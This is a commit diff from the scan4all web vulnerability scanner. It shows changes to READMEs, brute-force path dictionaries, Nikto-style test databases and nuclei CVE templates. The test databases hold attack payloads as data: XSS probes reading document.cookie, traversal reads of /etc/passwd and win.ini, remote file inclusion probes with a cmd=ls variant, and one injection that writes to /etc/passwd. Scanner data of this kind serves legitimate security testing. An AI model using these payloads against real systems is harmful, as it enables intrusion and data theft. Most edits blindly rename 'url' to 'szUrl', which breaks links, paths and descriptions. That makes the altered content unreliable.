Projects STRLCPY scan4all Commits c55b1a46
🤬
Showing first 200 files as there are too many
  • ■ ■ ■ ■
    .gitmodules
    1 1  [submodule "nuclei-templates"]
    2 2   path = nuclei-templates
    3  - url = [email protected]:hktalent/nuclei-templates.git
     3 + szUrl = [email protected]:hktalent/nuclei-templates.git
    4 4   
  • ■ ■ ■ ■ ■ ■
    README.md
    1  -[![Tweet](https://img.shields.io/twitter/url/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
     1 +[![Tweet](https://img.shields.io/twitter/szUrl/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
    2 2  <p align="center">
    3 3   <a href="/README_CN.md">README_中文</a> •
    4 4   <a href="/static/Installation.md">Compile/Install/Run</a> •
    skipped 144 lines
    149 149   <a href=https://github.com/hktalent/scan4all/discussions>Using Help</a>
    150 150  ```bash
    151 151  go build
    152  -# Precise scan url list UrlPrecise=true
     152 +# Precise scan szUrl list UrlPrecise=true
    153 153  UrlPrecise=true ./scan4all -l xx.txt
    154 154  # Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
    155 155  priorityNmap=false ./scan4all -tp http -list allOut.txt -v
    skipped 49 lines
  • ■ ■ ■ ■
    README_CN.md
    1  -[![Tweet](https://img.shields.io/twitter/url/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
     1 +[![Tweet](https://img.shields.io/twitter/szUrl/http/Hktalent3135773.svg?style=social)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![Follow on Twitter](https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=Hktalent3135773) [![GitHub Followers](https://img.shields.io/github/followers/hktalent.svg?style=social&label=Follow)](https://github.com/hktalent/)
    2 2  <p align="center">
    3 3   <a href="/README.md">README_EN</a> •
    4 4   <a href="/static/Installation.md">编译/安装/运行</a> •
    skipped 240 lines
  • ■ ■ ■ ■ ■ ■
    brute/dicts/filedic.txt
    skipped 1695 lines
    1696 1696  /api/payment?id=
    1697 1697  /api/prod/services
    1698 1698  /api/proxy
    1699  -/api/proxy?url=
     1699 +/api/proxy?szUrl=
    1700 1700  /api/saved_objects/_find?type=index-pattern&per_page=100
    1701 1701  /api/search
    1702 1702  /api/sessions
    skipped 5814 lines
    7517 7517  go.%EXT%
    7518 7518  google
    7519 7519  google-services.json
    7520  -gotoURL.asp?url=google.com&id=43569
     7520 +gotoURL.asp?szUrl=google.com&id=43569
    7521 7521  grabbed.html
    7522 7522  gradle-app.setting
    7523 7523  gradle/
    skipped 2120 lines
    9644 9644  plugins/editors/fckeditor
    9645 9645  plugins/fckeditor
    9646 9646  plugins/servlet/gadgets/makeRequest
    9647  -plugins/servlet/gadgets/makeRequest?url=https://google.com
     9647 +plugins/servlet/gadgets/makeRequest?szUrl=https://google.com
    9648 9648  plugins/servlet/oauth/users/icon
    9649 9649  plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload.swf
    9650 9650  plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf
    skipped 1484 lines
    11135 11135  ur-admin.php
    11136 11136  ur-admin/
    11137 11137  uri
    11138  -url
    11139  -url.jsp
     11138 +szUrl
     11139 +szUrl.jsp
    11140 11140  us
    11141 11141  usage
    11142 11142  usage/
    skipped 423 lines
    11566 11566  wp-content/plugins/disqus-comment-system/disqus.php
    11567 11567  wp-content/plugins/google-sitemap-generator/sitemap-core.php
    11568 11568  wp-content/plugins/hello.php
    11569  -wp-content/plugins/jrss-widget/proxy.php?url=
     11569 +wp-content/plugins/jrss-widget/proxy.php?szUrl=
    11570 11570  wp-content/plugins/super-forms/
    11571 11571  wp-content/plugins/wp-publication-archive/includes/openfile.php?file=
    11572 11572  wp-content/plugins/wpengine-snapshot/snapshots/
    skipped 267 lines
  • ■ ■ ■ ■
    config/databases/db_dictionary
    skipped 1682 lines
    1683 1683  upload
    1684 1684  uploader
    1685 1685  uploads
    1686  -url
     1686 +szUrl
    1687 1687  urls
    1688 1688  us
    1689 1689  usa
    skipped 152 lines
  • ■ ■ ■ ■ ■ ■
    config/databases/db_server_msgs
    skipped 117 lines
    118 118  "800098","jakarta-tomcat-4.0.1","0","Server will reveal path"
    119 119  "800099","JavaWebServer","0","Probably Sun Microsystem's servlet interface. May have default code which is exploitable. Try admin/admin for id/password."
    120 120  "800100","JetAdmin","0","HP Printer"
    121  -"800101","Jeus WebContainer\/([0-3]\.[0-2]\..*)","0","JEUS below 3.2.2 is vulnerable to XSS if a nonexistent url is requested, i.e. [victim site]/[javascript].jsp"
     121 +"800101","Jeus WebContainer\/([0-3]\.[0-2]\..*)","0","JEUS below 3.2.2 is vulnerable to XSS if a nonexistent szUrl is requested, i.e. [victim site]/[javascript].jsp"
    122 122  "800102","Jigsaw\/([0-1].*|2\.([0-1].*|2\.0))","0","Jigsaw 2.1.0 or below may be vulnerable to XSS if a nonexistent host name is requested, i.e. nosuchhost.domain.com/<script>..."
    123 123  "800103","Jigsaw\/2\.2\.1","0","Jigsaw 2.1.1 on Windows may be tricked into revealing the system path by requesting /aux two times."
    124 124  "800104","JRun\/([0-3]\..*|4\.0)","0","JRun 4.0 and below on IIS is vulnerable to remote buffer overflow with a filename over 4096. http://www.macromedia.com/v1/handlers/index.cfm?ID=23500 and http://www.eeye.com/html/Research/Advisories/index.html"
    skipped 1 lines
    126 126  "800106","KazaaClient","0","Kazaa may allow sensitive information to be retrieved, http://www.securiteam.com/securitynews/5UP0L2K55W.html"
    127 127  "800107","LabVIEW\/(5\.[1-9]|6\.[0-1])","0","LabVIEW 5.1.1 to 6.1 is vulnerable to a remote DoS by sending a malformed GET request. This DoS was not attempted."
    128 128  "800108","Lasso\/3\.6\.5","0","This version of Blueworld WebData engine is vulnerable to DoS by sending a 1600 character long GET request."
    129  -"800109","LilHTTP\/2\.1","0","LilHTTP server 2.1 allows password protected resources to be retrieved by prepending '/./' to the url."
     129 +"800109","LilHTTP\/2\.1","0","LilHTTP server 2.1 allows password protected resources to be retrieved by prepending '/./' to the szUrl."
    130 130  "800110","LocalWeb2000\/([0-1]\.*|2\.(0\.*|1\.0))","0","LocalWeb2000 2.1.0 and below allow protected files to be retrieved by prepending the request with /./"
    131 131  "800111","Lotus-Domino\/([0-3].*|4\.([0-1].*|2\.([0-1].*|3)))","0","This version of Lotus-Domino server has had multiple vulnerabilities. See the bugtraq archives for details."
    132 132  "800112","Lotus-Domino\/4\.[5-6]","0","This version of Lotus-Domino server is vulnerable to a DoS via the WEb Retriever. CAN-2003-0123."
    skipped 24 lines
    157 157  "800137","myCIO","0","The McAfee myCIO server provides antivirus updates to clients. This server has had multiple vulnerabilities in the past."
    158 158  "800138","Mylo/0\.([0-1]|2\.[0-1])","0","mod_mylo may be vulnerable to a remote buffer overflow. Upgrade to the latest version. BID-8287."
    159 159  "800139","MyServer 0\.([0-3]\..*|4\.[0-2])","0","MyServer versions lower than 0.5 contain multiple remote vulnerabilities."
    160  -"800140","MyWebServer\/(0\.*|1\.0[0-2])","0","MyWebServer versions 1.02 and below are vulnerable to a DoS by requesting a url of approximately 1000 characters."
     160 +"800140","MyWebServer\/(0\.*|1\.0[0-2])","0","MyWebServer versions 1.02 and below are vulnerable to a DoS by requesting a szUrl of approximately 1000 characters."
    161 161  "800141","ncsa","0","lower than v1.3 have multiple issues"
    162 162  "800142","neowebscript","0","Apache plugin to allow TCL use"
    163 163  "800143","netcloak","0","http://www.maxum.com plugin for webstar"
    skipped 120 lines
  • ■ ■ ■ ■ ■ ■
    config/databases/db_tests
    skipped 829 lines
    830 830  "000816","32774","4","/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","",""
    831 831  "000817","32774","4","/phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","",""
    832 832  "000818","27071","4","/phpimageview.php?pic=javascript:alert(8754)","GET","200","alert\(8754\)","","The\sdocument\shas\smoved","","PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    833  -"000819","0","4","/phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
     833 +"000819","0","4","/phpclassifieds/latestwap.php?szUrl=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    834 834  "000820","2193","4","/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""
    835 835  "000821","4297","4","/phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    836 836  "000822","11145","4","/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    skipped 93 lines
    930 930  "000917","0","4","/admin/login.php?path=\"></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    931 931  "000918","2243","4","/addressbook/index.php?surname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    932 932  "000919","2243","4","/addressbook/index.php?name=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    933  -"000920","0","4","/add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","",""," 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
     933 +"000920","0","4","/add.php3?szUrl=ja&adurl=javascript:<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","",""," 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    934 934  "000921","0","4","/a?<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.","",""
    935 935  "000922","54589","4","/a.jsp/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02.","",""
    936 936  "000923","38019","4","/?mod=<script>alert(document.cookie)</script>&op=browse","GET","<script>alert\(document\.cookie\)","","","","","Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    skipped 538 lines
    1475 1475  "001475","2721","7","../../../../../../../../../../etc/*","GET","passwd","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","",""
    1476 1476  "001476","2721","7","../../../../../../../../../../etc/passw*","GET","root:","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","",""
    1477 1477  "001477","2722","7","/bytehoard/index.php?infolder=../../../../../../../../../../../etc/","GET","passwd","","","","","ByteHoard 0.7 is vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher.","",""
    1478  -"001478","2723","3","/Search","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","FirstClass 7.1 server allows file listing of any directory by accessing the /Search url.","",""
     1478 +"001478","2723","3","/Search","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","FirstClass 7.1 server allows file listing of any directory by accessing the /Search szUrl.","",""
    1479 1479  "001479","2735","d","/musicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/","",""
    1480 1480  "001480","2735","d","@CGIDIRSmusicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/","",""
    1481 1481  "001481","275","3","/scripts/tools/newdsn.exe","GET","200","","","","","This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. BID-1818. CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)","",""
    skipped 978 lines
    2460 2460  "002621","3093","1","/tutos/file/file_select.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    2461 2461  "002622","3093","1","@TYPO3typo3/dev/translations.php","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    2462 2462  "002623","3093","1","/uifc/MultFileUploadHandler.php+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    2463  -"002624","3093","1","/url.jsp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
     2463 +"002624","3093","1","/szUrl.jsp","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    2464 2464  "002625","3093","1","/useraction.php3","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    2465 2465  "002626","3093","1","/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd","GET","root:","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    2466 2466  "002627","3093","1","/utils/sprc.asp+","GET","200","","","","","This might be interesting: has been seen in web logs from an unknown scanner.","",""
    skipped 536 lines
    3003 3003  "003221","5092","3","/config.inc","GET","200","","","","","DotBr 0.1 configuration file includes usernames and passwords.","",""
    3004 3004  "003222","5093","3","@CGIDIRSenviron.pl","GET","REMOTE_ADDR","","","","","Sambar Server default script reveals environment information","",""
    3005 3005  "003223","5094","3","@CGIDIRStestcgi.exe","GET","REMOTE_ADDR","","","","","Sambar Server default script reveals environment information","",""
    3006  -"003224","5095","3","/sysuser/docmgr/ieedit.stm?url=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
     3006 +"003224","5095","3","/sysuser/docmgr/ieedit.stm?szUrl=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
    3007 3007  "003225","5096","3","/sysuser/docmgr/iecreate.stm?template=../","GET","200","","","","","Sambar default file may allow directory listings.","",""
    3008 3008  "003226","5097","4","/wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    3009 3009  "003227","5098","4","/sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
    skipped 155 lines
    3165 3165  "003384","96","7","/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","",""
    3166 3166  "003385","9624","3","/pass_done.php","GET","200","","","","","PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.","",""
    3167 3167  "003386","9624","a","/admin/admin.php?adminpy=1","GET","200","","","","","PY-Membres 4.2 may allow administrator access.","",""
    3168  -"003387","0","1","/iishelp/iis/htm/tutorial/redirect.asp","GET","A URL is required","","","","","Possibly unchecked redirect with url= variable.","",""
     3168 +"003387","0","1","/iishelp/iis/htm/tutorial/redirect.asp","GET","A URL is required","","","","","Possibly unchecked redirect with szUrl= variable.","",""
    3169 3169  "003388","9695","3","/servlet/SnoopServlet","GET","Client Information","","","","","JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.","",""
    3170 3170  "003389","3268","2","/Citrix/PNAgent/","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","Directory indexing found.","",""
    3171 3171  "003390","3268","2","/Citrix/ICAWEB/","GET","[Ii]ndex [Oo]f ","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) ","","","","Directory indexing found.","",""
    skipped 1209 lines
    4381 4381  "004603","5292","c","/cron.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4382 4382  "004604","5292","c","/crontab/run_billing.php?config[include_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4383 4383  "004605","5292","c","/crontab/run_billing.php?config[include_dir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4384  -"004606","5292","c","/cross.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4385  -"004607","5292","c","/cross.php?url=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     4384 +"004606","5292","c","/cross.php?szUrl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     4385 +"004607","5292","c","/cross.php?szUrl=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4386 4386  "004608","5292","c","/custom_vars.php?sys[path_addon]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4387 4387  "004609","5292","c","/customer/product.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4388 4388  "004610","5292","c","/cwb/comanda.php?INCLUDE_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    skipped 229 lines
    4618 4618  "004843","5292","c","/i_head.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4619 4619  "004844","5292","c","/i_nav.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4620 4620  "004845","5292","c","/iframe.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4621  -"004846","5292","c","/image.php?url=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     4621 +"004846","5292","c","/image.php?szUrl=@RFIURL???","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4622 4622  "004847","5292","c","/impex/ImpExData.php?systempath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4623 4623  "004848","5292","c","/import.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4624 4624  "004849","5292","c","/importinfo.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    skipped 305 lines
    4930 4930  "005155","5292","c","/index.php?this_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4931 4931  "005156","5292","c","/index.php?txt=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4932 4932  "005157","5292","c","/index.php?up=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4933  -"005158","5292","c","/index.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     4933 +"005158","5292","c","/index.php?szUrl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4934 4934  "005159","5292","c","/index.php?w=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4935 4935  "005160","5292","c","/index.php?way=@RFIURL??????????????","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    4936 4936  "005161","5292","c","/index1.php?=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    skipped 538 lines
    5475 5475  "005700","5292","c","/rechnung.php?_PHPLIB[libdir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5476 5476  "005701","5292","c","/reconfig.php?GLOBALS[CLPath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5477 5477  "005702","5292","c","/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5478  -"005703","5292","c","/redirect.php?url=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     5478 +"005703","5292","c","/redirect.php?szUrl=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5479 5479  "005704","5292","c","/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5480 5480  "005705","5292","c","/register.php?base_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5481 5481  "005706","5292","c","/releasenote.php?mosConfig_absolute_path=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    skipped 135 lines
    5617 5617  "005842","5292","c","/sources/Admin/admin_templates.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5618 5618  "005843","5292","c","/sources/functions.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5619 5619  "005844","5292","c","/sources/help.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5620  -"005845","5292","c","/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5621  -"005846","5292","c","/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     5620 +"005845","5292","c","/sources/join.php?FORM[szUrl]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
     5621 +"005846","5292","c","/sources/join.php?FORM[szUrl]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5622 5622  "005847","5292","c","/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5623 5623  "005848","5292","c","/sources/mail.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    5624 5624  "005849","5292","c","/sources/misc/new_day.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)","",""
    skipped 856 lines
    6481 6481  "006778","0","2be","/sitecore/debug/Profile.xslt","GET","Data\sCache","cachemiss","","","","Sitecore CMS admin/restricted pages available","",""
    6482 6482  "006779","0","2be","/sitecore/login/default.aspx","GET","LoginPanelOuter","","","","","Sitecore CMS admin login","",""
    6483 6483  "006780","0","2be","/sitecore/shell/WebService/Service.asmx","GET","operations\sare\ssupported","","","","","Sitecore CMS webservice found","",""
    6484  -"006781","0","2be","/?sc_mode=edit","GET","302","","sitecore","","","Sitecore CMS is installed. This url redirects to the login page.","",""
     6484 +"006781","0","2be","/?sc_mode=edit","GET","302","","sitecore","","","Sitecore CMS is installed. This szUrl redirects to the login page.","",""
    6485 6485  "006782","0","2be","/sitecore/admin/stats.aspx","GET","Renderings","","","","","Sitecore CMS admin/restricted pages available","",""
    6486 6486  "006783","0","2be","/wcadmin/login.aspx","GET","QS\/1","","","","","QS/1 Webconnect administration panel","",""
    6487  -"006784","74115","4","/sitecore/login?xmlcontrol=Application&url=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=","GET","src=\"http:\/\/www\.example\.com","","","","","Sitecore CMS contains an arbitrary redirect vulnerability.","",""
     6487 +"006784","74115","4","/sitecore/login?xmlcontrol=Application&szUrl=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=","GET","src=\"http:\/\/www\.example\.com","","","","","Sitecore CMS contains an arbitrary redirect vulnerability.","",""
    6488 6488  "006785","102660","4","/?xmlcontrol=body%20onload=alert(123)","GET","<body\sONLOAD=ALERT\s123","","","","","Sitecore CMS vulnerable to Cross-Site Scripting","",""
    6489 6489  "006786","0","be","/crystal/enterprise10/admin/en/admin.cwr","GET","Crystal\sManagement\sConsole","","","","","Crystal Enterprise Management Console found","",""
    6490 6490  "006787","0","1","/encrypt.aspx","GET","200","","","","","This might be interesting.","",""
    skipped 504 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2008/CVE-2008-1059.yaml
    skipped 9 lines
    10 10   - https://www.exploit-db.com/exploits/5194
    11 11   - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
    12 12   - https://nvd.nist.gov/vuln/detail/CVE-2008-1059
    13  - - http://secunia.com/advisories/29099
     13 + - https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
    14 14   classification:
    15 15   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    16 16   cvss-score: 7.5
    skipped 24 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2008/CVE-2008-1061.yaml
    1 1  id: CVE-2008-1061
    2 2   
    3 3  info:
    4  - name: Wordpress Plugin Sniplets 1.2.2 - Cross-Site Scripting
     4 + name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
    5 5   author: dhiyaneshDK
    6 6   severity: medium
    7 7   description: |
    8  - Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php; the (2) url parameter to (e) view/admin/submenu.php; and the (3) page parameter to (f) view/admin/pager.php.
